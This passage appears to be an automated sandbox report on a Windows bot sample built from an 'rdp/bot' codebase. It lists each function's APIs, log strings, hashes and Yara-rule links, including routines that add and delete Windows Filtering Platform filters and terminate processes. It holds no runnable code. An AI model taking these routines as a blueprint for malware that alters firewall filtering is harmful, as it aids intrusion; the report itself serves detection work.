String ID: (path != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Delete(path_wc=%s,f_path=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[E] (%s) -> RemoveDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_delete
API String ID: 2460052984-4087913290
Opcode ID: 2b43407fb40812be003df21873016ce3dca91500fd4b34bac2934c2be9073314
Instruction ID: 24deb5dfc77a8e9008047b49208040edf87686cfdf2deefbadd142339ce0201f
Opcode Fuzzy Hash: 2b43407fb40812be003df21873016ce3dca91500fd4b34bac2934c2be9073314
Instruction Fuzzy Hash: 3CA19221D4D683C6EE208B18A7943FA6371EFAE345F540032F54DCE695EE3CE94A8709

Function 00007FF66EBA53BF Relevance: 42.3, APIs: 16, Strings: 12, Instructions: 270stringCOMMON

Download Yara Rule

APIs

strcpy.MSVCRT ref: 00007FF66EBA541A
strlen.MSVCRT ref: 00007FF66EBA5422
strlen.MSVCRT ref: 00007FF66EBA5443
strlen.MSVCRT ref: 00007FF66EBA5455
strcmp.MSVCRT ref: 00007FF66EBA54FD
strcmp.MSVCRT ref: 00007FF66EBA5515
strcat.MSVCRT ref: 00007FF66EBA5575
strlen.MSVCRT ref: 00007FF66EBA557D
strcpy.MSVCRT ref: 00007FF66EBA5663
strlen.MSVCRT ref: 00007FF66EBA566B
strlen.MSVCRT ref: 00007FF66EBA568D
strcat.MSVCRT ref: 00007FF66EBA56A6
strcpy.MSVCRT ref: 00007FF66EBA56B9
strlen.MSVCRT ref: 00007FF66EBA56C1
strlen.MSVCRT ref: 00007FF66EBA56E3
strcat.MSVCRT ref: 00007FF66EBA56FF

Strings

[I] (%s) -> Done(src=%s,dst=%s), xrefs: 00007FF66EBA58EC
[I] (%s) -> Filtered(f_src=%s,flt=%s), xrefs: 00007FF66EBA55AD
[D] (%s) -> Copy(f_src=%s,f_dst=%s), xrefs: 00007FF66EBA5719
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA55DB, 00007FF66EBA5606
*, xrefs: 00007FF66EBA545A
|, xrefs: 00007FF66EBA5582
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA55C6, 00007FF66EBA55F1
(dst != NULL), xrefs: 00007FF66EBA55F8
fs_dir_copy, xrefs: 00007FF66EBA55A6, 00007FF66EBA55D4, 00007FF66EBA55FF, 00007FF66EBA5712, 00007FF66EBA5869, 00007FF66EBA58E5
NULL, xrefs: 00007FF66EBA58CD, 00007FF66EBA58D6
[E] (%s) -> Failed(src=%s,dst=%s,err=%08x), xrefs: 00007FF66EBA5870
(src != NULL), xrefs: 00007FF66EBA55CD

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strlen$strcatstrcpy$strcmp
String ID: (dst != NULL)$(src != NULL)$*$C:/Projects/rdp/bot/codebase/fs.c$NULL$[D] (%s) -> Copy(f_src=%s,f_dst=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(src=%s,dst=%s,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s)$[I] (%s) -> Filtered(f_src=%s,flt=%s)$fs_dir_copy$|
API String ID: 2140730755-3699962909
Opcode ID: 32065dab922eb16873fdd4e86eae5118828848c3aacaff6a512e0109f51071df
Instruction ID: 10711698176b01bc74c57154d8493745e53878f3e64633a51fbb736deabc2ad1
Opcode Fuzzy Hash: 32065dab922eb16873fdd4e86eae5118828848c3aacaff6a512e0109f51071df
Instruction Fuzzy Hash: 20C1846194D682C2FE219A19A7843FA6271FF6A344F840036FA4D8F695EF6CE605C70D

Function 00007FF66EBA1D60 Relevance: 35.2, APIs: 12, Strings: 8, Instructions: 207memoryCOMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32 ref: 00007FF66EBA1D8A
GetTokenInformation.ADVAPI32 ref: 00007FF66EBA1DC0
GetLastError.KERNEL32 ref: 00007FF66EBA1DCE
LocalFree.KERNEL32 ref: 00007FF66EBA1E08
CloseHandle.KERNEL32 ref: 00007FF66EBA1E13
GetLastError.KERNEL32 ref: 00007FF66EBA1EB8
LocalAlloc.KERNEL32 ref: 00007FF66EBA1F70
GetTokenInformation.ADVAPI32 ref: 00007FF66EBA1F9E
GetLastError.KERNEL32 ref: 00007FF66EBA1FAC

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

LocalAlloc.KERNEL32 ref: 00007FF66EBA209A
GetLengthSid.ADVAPI32 ref: 00007FF66EBA20AC
memcpy.MSVCRT ref: 00007FF66EBA20BC

Strings

[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu), xrefs: 00007FF66EBA1DEA, 00007FF66EBA1FC1
(sid != NULL), xrefs: 00007FF66EBA1E62
(hnd != NULL), xrefs: 00007FF66EBA1E32
[E] (%s) -> Failed(hnd=0x%p,err=%08x), xrefs: 00007FF66EBA1EA1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA1E40, 00007FF66EBA1E70
process_get_user_sid, xrefs: 00007FF66EBA1DE3, 00007FF66EBA1E39, 00007FF66EBA1E69, 00007FF66EBA1E9A, 00007FF66EBA1EC6, 00007FF66EBA1FBA
[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu), xrefs: 00007FF66EBA1ECD
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF66EBA1E2B, 00007FF66EBA1E5B

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorLastLocalToken$AllocInformation$CloseFreeHandleLengthOpenProcessfflushfwritememcpy
String ID: (hnd != NULL)$(sid != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(hnd=0x%p,err=%08x)$[E] (%s) -> GetTokenInformation failed(hnd=0x%p,gle=%lu)$[E] (%s) -> OpenProcessToken failed(hnd=0x%p,gle=%lu)$process_get_user_sid
API String ID: 3826151639-1775164968
Opcode ID: 808b03ec39ad6f7e4897e1658db8f36ae615b9cf3e59cba8cdb0ff454670df4e
Instruction ID: d00cf3845d7ba9f47ce16df75d852b6d41899d4db6df9ba442d1c4c1e5c64290
Opcode Fuzzy Hash: 808b03ec39ad6f7e4897e1658db8f36ae615b9cf3e59cba8cdb0ff454670df4e
Instruction Fuzzy Hash: 1C9140A1E4C542C6FEA04718E6907B91276EFAE795F190032F54ECF694DE3CE8898349

Function 00007FF66EBA795A Relevance: 33.5, APIs: 8, Strings: 11, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF66EBA797E
HeapAlloc.KERNEL32 ref: 00007FF66EBA798F
GetProcessHeap.KERNEL32 ref: 00007FF66EBA7C24
HeapFree.KERNEL32 ref: 00007FF66EBA7C35
FwpmFilterAdd0.FWPUCLNT ref: 00007FF66EBA7BEA

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF66EBA7C74
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF66EBA7CAF
FwpmFilterAdd0.FWPUCLNT ref: 00007FF66EBA7D44

Strings

mem_alloc, xrefs: 00007FF66EBA7C52
;9rJ, xrefs: 00007FF66EBA7CEF
setup_svc_filt, xrefs: 00007FF66EBA7C07, 00007FF66EBA7C8D, 00007FF66EBA7CD2, 00007FF66EBA7D67
[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx), xrefs: 00007FF66EBA7CD9
TL, xrefs: 00007FF66EBA79C0
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF66EBA7C94
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF66EBA7C59
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx), xrefs: 00007FF66EBA7C0E
3L, xrefs: 00007FF66EBA7B7F
TL, xrefs: 00007FF66EBA7A0C
[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx), xrefs: 00007FF66EBA7D6E

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: FilterFwpmHeap$Add0DeleteKey0Process$AllocFreefflushfwrite
String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$setup_svc_filt
API String ID: 3629392964-1470975255
Opcode ID: 11509d7dc318c6951894152db2c3eb95f66ab3a05b6d85fb9d0b191f7301a22d
Instruction ID: a38431d6e4c4397653d4f5b915e9829ace6de959391cde457d52f5765160e1dc
Opcode Fuzzy Hash: 11509d7dc318c6951894152db2c3eb95f66ab3a05b6d85fb9d0b191f7301a22d
Instruction Fuzzy Hash: A4A1942260D7C2C6E761CB19B58039AB7B5EB96740F044134EACD8BB99EF7DC444CB45

Function 00007FF66EBA8153 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF66EBA8008: GetFileAttributesW.KERNEL32 ref: 00007FF66EBA8019

wcslen.MSVCRT ref: 00007FF66EBA8195
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF66EBA8241
FwpmFilterDeleteByKey0.FWPUCLNT ref: 00007FF66EBA827F
FwpmFilterAdd0.FWPUCLNT ref: 00007FF66EBA8448
GetProcessHeap.KERNEL32 ref: 00007FF66EBA848A
HeapFree.KERNEL32 ref: 00007FF66EBA849B
GetProcessHeap.KERNEL32 ref: 00007FF66EBA84B2
HeapFree.KERNEL32 ref: 00007FF66EBA84C3
FwpmFilterAdd0.FWPUCLNT ref: 00007FF66EBA8523

Strings

;9rJ, xrefs: 00007FF66EBA84CE
TL, xrefs: 00007FF66EBA81B9
[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx), xrefs: 00007FF66EBA82A3
TL, xrefs: 00007FF66EBA8205
[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx), xrefs: 00007FF66EBA8261
3L, xrefs: 00007FF66EBA83DD
setup_app_filt, xrefs: 00007FF66EBA825A, 00007FF66EBA829C, 00007FF66EBA8461, 00007FF66EBA8540
[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx), xrefs: 00007FF66EBA8468
[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx), xrefs: 00007FF66EBA8547

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: FilterFwpmHeap$Add0DeleteFreeKey0Process$AttributesFilewcslen
String ID: 3L$;9rJ$TL$TL$[E] (%s) -> FwpmFilterAdd0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterAdd0(IPv6) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv4) failed(res=%08lx)$[E] (%s) -> FwpmFilterDeleteByKey0(IPv6) failed(res=%08lx)$setup_app_filt
API String ID: 2990311666-1793103013
Opcode ID: da94db41fa5749e2168b4c5b0c2792bc5edf629c1c334342347b7905099d406d
Instruction ID: 8fe782a7c67d9d04856caf9e957ed0761bf43ac4e6d909288563357829f9b596
Opcode Fuzzy Hash: da94db41fa5749e2168b4c5b0c2792bc5edf629c1c334342347b7905099d406d
Instruction Fuzzy Hash: 0191B62160DBC2D5E761DB19B48039AB7B2EBAA740F144134EACC8BB99EF3DC145CB05

Function 00007FF66EBA405E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF66EBA407D
CreateDirectoryA.KERNEL32 ref: 00007FF66EBA409F
GetLastError.KERNEL32 ref: 00007FF66EBA40F0
strcpy.MSVCRT ref: 00007FF66EBA4141
strlen.MSVCRT ref: 00007FF66EBA4149
strlen.MSVCRT ref: 00007FF66EBA4165
strlen.MSVCRT ref: 00007FF66EBA4176
CreateDirectoryA.KERNEL32 ref: 00007FF66EBA41E7
GetLastError.KERNEL32 ref: 00007FF66EBA41F1

Strings

[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF66EBA432D
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF66EBA42C6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA40D5
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF66EBA4109
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA40C0
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FF66EBA41A0
NULL, xrefs: 00007FF66EBA4317
(path != NULL), xrefs: 00007FF66EBA40C7
fs_dir_create, xrefs: 00007FF66EBA40CE, 00007FF66EBA4102, 00007FF66EBA4199, 00007FF66EBA42BF, 00007FF66EBA4326

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$strcpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 1104438493-1059260517
Opcode ID: 070307e4c8645b09abb560ad24502875dae9e690aa16ba2f09ebd2749ca33e2d
Instruction ID: e5eda4692e7ce37c75df613236874ec719969a0145c5457967776cf5ec9a16be
Opcode Fuzzy Hash: 070307e4c8645b09abb560ad24502875dae9e690aa16ba2f09ebd2749ca33e2d
Instruction Fuzzy Hash: C8716C51E5C243D3FF604B58AA847BD1672EB7E744F580132F90E8E696DE6CE8468309

Function 00007FF66EBA341C Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 187synchronizationCOMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32 ref: 00007FF66EBA3436
WaitForSingleObject.KERNEL32 ref: 00007FF66EBA345A
GetExitCodeProcess.KERNEL32 ref: 00007FF66EBA3468
GetLastError.KERNEL32 ref: 00007FF66EBA350F
TerminateProcess.KERNEL32 ref: 00007FF66EBA35FC
GetLastError.KERNEL32 ref: 00007FF66EBA360A
GetLastError.KERNEL32 ref: 00007FF66EBA36F1

Part of subcall function 00007FF66EBA33C0: CloseHandle.KERNEL32 ref: 00007FF66EBA33D8
Part of subcall function 00007FF66EBA33C0: CloseHandle.KERNEL32 ref: 00007FF66EBA33DE

Strings

[I] (%s) -> Done(pid=%lu,exit_code=%08lx), xrefs: 00007FF66EBA349F
[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FF66EBA3705
[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu), xrefs: 00007FF66EBA3620
process_close, xrefs: 00007FF66EBA3498, 00007FF66EBA34C3, 00007FF66EBA34F2, 00007FF66EBA351E, 00007FF66EBA3619, 00007FF66EBA36FE
[E] (%s) -> Failed(pid=%lu,err=%08x), xrefs: 00007FF66EBA34F9
[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu), xrefs: 00007FF66EBA3525
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA34CA
C:/Projects/rdp/bot/codebase/process.c, xrefs: 00007FF66EBA34B5
(pi != NULL), xrefs: 00007FF66EBA34BC

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: ErrorLastProcess$CloseCodeExitHandle$ObjectSingleTerminateWait
String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(pid=%lu,err=%08x)$[E] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$[E] (%s) -> TerminateProcess failed(pid=%lugle=%lu)$[I] (%s) -> Done(pid=%lu,exit_code=%08lx)$[W] (%s) -> GetExitCodeProcess failed(pid=%lugle=%lu)$process_close
API String ID: 1879646588-710610406
Opcode ID: b8dfa760788b603add58484a8a4d436d7d672801e8d78d7ee9c84c828399f387
Instruction ID: 6c1273bdaf1286956426a86f91970e4a19e45b22d605a622935287f0ddf8f273
Opcode Fuzzy Hash: b8dfa760788b603add58484a8a4d436d7d672801e8d78d7ee9c84c828399f387
Instruction Fuzzy Hash: 9B817E62E4C517C3FF619A1CA6886BC5270EF2A794F150036E95EDF2A4DE2CAC458389

Function 00007FF66EBA3909 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF66EBA392A
GetLastError.KERNEL32 ref: 00007FF66EBA3A0A

Strings

P, xrefs: 00007FF66EBA3A93
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA39B5, 00007FF66EBA39EE
(attr != NULL), xrefs: 00007FF66EBA39E0
fs_attr_get, xrefs: 00007FF66EBA3977, 00007FF66EBA39AE, 00007FF66EBA39E7, 00007FF66EBA3A18, 00007FF66EBA3B4C
c, xrefs: 00007FF66EBA39D1
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF66EBA397E
NULL, xrefs: 00007FF66EBA3B3A
(path != NULL), xrefs: 00007FF66EBA39A7
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF66EBA3B53
, xrefs: 00007FF66EBA3A2B
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA39A0, 00007FF66EBA39D9
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF66EBA3A1F
~, xrefs: 00007FF66EBA3A8E

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-3397184676
Opcode ID: 6be7d6a2cb7f3a98685fd9e65aa2ebdd5b2300d699eedd8d9a08babb2a0e194a
Instruction ID: fbba9eaa1d673a1f6e55ce2d358878f2eee765ac6d376b110390805fa9bbef91
Opcode Fuzzy Hash: 6be7d6a2cb7f3a98685fd9e65aa2ebdd5b2300d699eedd8d9a08babb2a0e194a
Instruction Fuzzy Hash: 57515EB0D8C617D3FEB05B09A7883BD2270AF2EB94E540132F95F8E594EE6DA5458309

Function 00007FF66EBA6776 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF66EBA67AA

Part of subcall function 00007FF66EBA14E2: fwrite.MSVCRT ref: 00007FF66EBA158E
Part of subcall function 00007FF66EBA14E2: fflush.MSVCRT ref: 00007FF66EBA159A

GetLastError.KERNEL32 ref: 00007FF66EBA6909

Strings

(xpath != NULL), xrefs: 00007FF66EBA683D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA6818, 00007FF66EBA684B, 00007FF66EBA687B, 00007FF66EBA68AB
fs_path_expand, xrefs: 00007FF66EBA67DE, 00007FF66EBA6811, 00007FF66EBA6844, 00007FF66EBA6874, 00007FF66EBA68A4, 00007FF66EBA68D6, 00007FF66EBA6917, 00007FF66EBA69E4
[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF66EBA67E5
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF66EBA6803, 00007FF66EBA6836, 00007FF66EBA6866, 00007FF66EBA6896
(xpath_sz != NULL), xrefs: 00007FF66EBA686D
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF66EBA69EB
((*xpath_sz) > 0), xrefs: 00007FF66EBA689D
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF66EBA68DD
(path != NULL), xrefs: 00007FF66EBA680A
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF66EBA691E

Memory Dump Source

Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true

Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd

Similarity

API ID: EnvironmentErrorExpandLastStringsfflushfwrite
String ID: ((*xpath_sz) > 0)$(path != NULL)$(xpath != NULL)$(xpath_sz != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu)$[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x)$[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu)$fs_path_expand
API String ID: 1721699506-2819899730
Opcode ID: e16da2df85cf769ba2e277f4be1a100988b21d28fa337b9003040fbccfaadd4b
Instruction ID: abb816aa5a70fbb9d1e26048ce717c0e0fb8271717f652b67c315b4d0104a76d
Opcode Fuzzy Hash: e16da2df85cf769ba2e277f4be1a100988b21d28fa337b9003040fbccfaadd4b
Instruction Fuzzy Hash: 6E6139A1E5C547D2FE208B1CEA803B83275EB6A744F194036E50DCF698EE7DE946834D

Function 00007FF66EBA65E3 Relevance: 19.6, APIs: 4, Strings: 9, Instructions: 94stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF66EBA660E
strlen.MSVCRT ref: 00007FF66EBA6637
strlen.MSVCRT ref: 00007FF66EBA6643
strlen.MSVCRT ref: 00007FF66EBA6659

Strings

(path_sz != NULL), xrefs: 00007FF66EBA66C3
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF66EBA66A1, 00007FF66EBA66D1, 00007FF66EBA6701
[I] (%s) -> Done(path=%s,path_sz=%llu), xrefs: 00007FF66EBA666E
